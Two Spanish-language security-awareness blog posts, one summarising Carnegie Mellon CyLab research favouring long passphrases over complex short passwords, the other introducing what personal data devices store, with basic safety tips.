Uno de los mayores dolores de cabeza que cotidianamente nos aqueja en el uso de productos y servicios en internet, es el tener que asignar una contraseña. Dado que debemos tener en cuenta que la contraseña que se designe debe brindar garantías de no ser fácilmente identificada y vulnerada por un atacante.

El mayor de los inconvenientes que encontramos al crear una contraseña es decidir entre una contraseña segura (o al menos así lo considerábamos hasta hoy) pero difícil (incluso imposible) de recordar o aquellas que podemos recordar fácilmente pero que también pueden ser descubiertas así de fácil.

En este articulo vamos a hablar de un estudio en el que sus desarrolladores se pudo haber encontrado una solución a nuestros problemas.

Los investigadores Joshua Tan, Lujo Bauer, Nicolas Christin y Lorrie Faith Cranor del laboratorio de seguridad y privacidad de la universidad Carnegie Mellon (Cylab) desarrollaron una política de creación seguras y fáciles de recordar. Estos investigadores aseguran que en su estudio que duró más de diez años encontraron que las reglas utilizadas actualmente para crear una contraseña segura (utilizar letras mayúsculas y minúsculas, números y símbolos. Entre otras), no son tan seguras como creíamos y que por el contrario tienden a tener efectos negativos en la usabilidad de la contraseña.

Gracias a su investigación, los científicos del Cylab desarrollaron un "medidor de fortaleza de contraseña" que hace uso de una red neuronal artificial la cual va aprendiendo con forme va escaneando contraseñas existentes e identifica tendencias. Este medidor mide la seguridad de la contraseña y da sugerencias para hacerla más fuerte, por ejemplo: añadir algún carácter adicional o dividir palabras comunes.

Durante el estudio, los investigadores probaron la eficacia de varias políticas de creación de contraseñas como: mínimo de caracteres, uso de caracteres especiales, bloqueo de contraseñas inseguras (password, 123456789), entre otras.

En conclusión, en este estudio los investigadores de Cylab encontraron que una contraseña segura es aquella que tenga un mínimo de 12 caracteres. Ademas este estudio concluye que es más segura y fácil de recordar una contraseña de mayor longitud a una con caracteres especiales. En el estudio se recomienda, por ejemplo, utilizar frases que incluyan: sujeto-acción-objeto (pedro patea pelota) y después realizar algunas variaciones en la frase; para crear una contraseña que cumplirá con el requisito de longitud y será fácil de recordar.

Finalmente, se recomienda que las empresas implementen en los formularios de registro de sus sitios web herramientas que guíen a los usuarios para crear contraseñas más seguras, que por ejemplo garanticen un mínimo de caracteres, impidan el uso de contraseñas fáciles de adivinar o que se encuentren en listas negras de contraseñas comprometidas, como Pwned por ejemplo.

Fuente: Genbeta

@jmvargas19

@TheHackingDay

¿QUÉ SABEN TUS DISPOSITIVOS SOBRE TI?

2020-07-22T16:20:00.000-05:00

En esta era marcada por los avances tecnológicos es bastante extraño encontrar personas que no cuenten con un dispositivo que le permita conectarse al mundo a través de internet.

Pero en muchas ocasiones los avances tecnológicos son tan significativos y suceden tan rápido que no nos dan tiempo de conocer completamente como funciona una tecnología cuando ya la estamos cambiando por otra.

Pensando en esto, hemos querido en este artículo echar un vistazo a los datos que un dispositivo puede almacenar sobre su propietario y que tal vez este no lo sabe.

Antes que nada, recordemos que al utilizar un dispositivo tecnológico para conectarnos a internet (Computador, Celular, Tablet, Smart TV, …) debemos adoptar unas medidas (mínimas) de precaución para no caer en manos de ciberdelincuentes.

Acciones tan sencillas como tener actualizado tanto el sistema operativo del equipo como las aplicaciones instaladas en este, contar con una buena solución de seguridad instalada, revisar los links antes de hacer clic en ellos, evitar los anuncios llamativos en internet, utilizar una contraseña fuerte, usar una autenticación de doble factor, entre otras tantas que se pueden aplicar; le permiten al usuario navegar más tranquilo en internet, pero a pesar de tomar algunas precauciones para utilizar su equipo ¿Usted se ha detenido a pensar qué información personal se encuentra almacenada en este?

La siguiente infografía le permitirá ver un poco sobre los datos que se almacena su equipo sobre usted.

@jmvargas19

@TheHackingDay